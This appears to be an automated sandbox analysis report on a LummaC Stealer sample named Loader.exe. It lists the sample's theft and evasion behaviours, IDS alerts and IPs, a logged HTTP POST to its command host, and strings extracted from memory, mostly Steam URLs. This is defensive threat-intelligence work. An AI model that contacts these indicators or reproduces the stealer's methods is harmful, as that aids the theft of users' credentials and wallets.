Edit tour

Windows Analysis Report
Loader.exe

Overview

General Information

Sample name:	Loader.exe
Analysis ID:	1634540
MD5:	dc56d5e6f7e20eb80e375f2ff15b9b66
SHA1:	a3219c9d73f8dc4054bc705bc7191b82f202b2d9
SHA256:	ed9d9829d03cdfc38708285ad020935bec899dddb11f51754be82e6b8e2e3991
Tags:	exeLummaStealeruser-TornadoAV_dev
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

Contains functionality to inject code into remote processes

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Loader.exe (PID: 7612 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: DC56D5E6F7E20EB80E375F2FF15B9B66)

Loader.exe (PID: 7660 cmdline: "C:\Users\user\Desktop\Loader.exe" MD5: DC56D5E6F7E20EB80E375F2FF15B9B66)

WerFault.exe (PID: 7792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7612 -s 972 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000002.2477728323.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000000.00000002.1303335822.0000000004079000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
1.2.Loader.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
1.2.Loader.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.Loader.exe.4079550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-11T01:13:23.001415+0100	2028371	3	Unknown Traffic	192.168.2.6	49692	92.122.104.90	443	TCP
2025-03-11T01:13:25.964764+0100	2028371	3	Unknown Traffic	192.168.2.6	49695	188.114.96.3	443	TCP
2025-03-11T01:13:48.436130+0100	2028371	3	Unknown Traffic	192.168.2.6	49700	92.122.104.90	443	TCP
2025-03-11T01:13:51.114062+0100	2028371	3	Unknown Traffic	192.168.2.6	49701	188.114.96.3	443	TCP
2025-03-11T01:13:54.146385+0100	2028371	3	Unknown Traffic	192.168.2.6	49702	92.122.104.90	443	TCP
2025-03-11T01:13:56.837212+0100	2028371	3	Unknown Traffic	192.168.2.6	49703	188.114.96.3	443	TCP
2025-03-11T01:14:00.001493+0100	2028371	3	Unknown Traffic	192.168.2.6	49704	92.122.104.90	443	TCP
2025-03-11T01:14:02.863593+0100	2028371	3	Unknown Traffic	192.168.2.6	49705	92.122.104.90	443	TCP
2025-03-11T01:14:05.703409+0100	2028371	3	Unknown Traffic	192.168.2.6	49706	92.122.104.90	443	TCP
2025-03-11T01:14:08.518073+0100	2028371	3	Unknown Traffic	192.168.2.6	49707	92.122.104.90	443	TCP
2025-03-11T01:14:11.317160+0100	2028371	3	Unknown Traffic	192.168.2.6	49708	188.114.96.3	443	TCP
2025-03-11T01:14:14.347107+0100	2028371	3	Unknown Traffic	192.168.2.6	49710	92.122.104.90	443	TCP
2025-03-11T01:14:17.247224+0100	2028371	3	Unknown Traffic	192.168.2.6	49711	188.114.96.3	443	TCP
2025-03-11T01:14:20.907182+0100	2028371	3	Unknown Traffic	192.168.2.6	49713	23.197.127.21	443	TCP
2025-03-11T01:14:23.606566+0100	2028371	3	Unknown Traffic	192.168.2.6	49714	23.197.127.21	443	TCP
2025-03-11T01:14:26.337293+0100	2028371	3	Unknown Traffic	192.168.2.6	49716	188.114.96.3	443	TCP

HTTP traffic detected: POST /aRIsjI HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 61Host: areawannte.bet

Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:27060
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.5.dr	String found in binary or memory: http://upx.sf.net
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: Loader.exe, 00000001.00000002.2478791044.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://areawannte.bet/
Source: Loader.exe, 00000001.00000002.2478791044.00000000010B7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://areawannte.bet/I
Source: Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://areawannte.bet/aRIsjI
Source: Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://areawannte.bet:443/aRIsj
Source: Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://areawannte.bet:443/aRIsjI
Source: Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://checkout.steampowered.com/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fa?
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Gzg8NS4HKwGo&a
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=GlKQ1cghJWE2&l=english&_c
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=1VeaVEsE
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=Bdoh
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=cMt-H-zOgNUp&l=english&am
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=LrC2xWhJTNZp&l=e
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
Source: Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=PCCoCNLxwF4M&am
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/DP
Source: Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/L
Source: Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/dP
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199822375128
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000102C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199822375128/badges
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/7656
Source: Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128
Source: Loader.exe, 00000001.00000002.2478791044.000000000107A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199822375128T
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamloopback.host
Source: Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: Loader.exe, 00000001.00000002.2478791044.00000000010F2000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.00000000010FC000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479485621.000000000110C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;X-Frame-OptionsSAMEORIGINPersistent-AuthWWW-AuthenticateVarysteamCou
Source: Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: Loader.exe, 00000001.00000002.2479887742.00000000038C7000.00000004.00000800.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2478791044.000000000105B000.00000004.00000020.00020000.00000000.sdmp, Loader.exe, 00000001.00000002.2479887742.00000000038B0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
